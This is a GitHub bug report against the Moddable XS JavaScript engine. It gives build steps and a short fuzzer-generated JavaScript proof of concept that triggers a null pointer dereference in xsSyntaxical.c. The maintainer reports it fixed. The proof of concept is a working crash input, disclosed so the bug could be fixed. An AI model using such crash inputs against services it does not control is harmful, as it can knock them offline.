Moddable-OpenSource/moddable #378: null pointer dereference

rain6851, 2020-06-02:
# Enviroment
```
operating system: ubuntu18.04
compile command:  cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
```
# poc:
```
var re = eval('RYYr3HBNdbk/Goz,' + new RegExp('').source + 'f');
var BcaA = new SharedArrayBuffer(null);
var SGHt = new SharedArrayBuffer(null);
var MTnX = Math;
assert.sameValue(re.test(''), true);
```
# vulnerability analysis
```
crash position: xs/sources/xsSyntaxical.c:620
```
We can see that the program tries to access the memory area pointed to by `rdx`, but the value of `rdx` is 0

[image]

[image]

rain6851, 2020-06-02:
@phoddie @mkellner @Moddable-OpenSource please check the issue

phoddie, 2020-08-05:
Fixed with latest push

closed 2020-09-03 by phoddie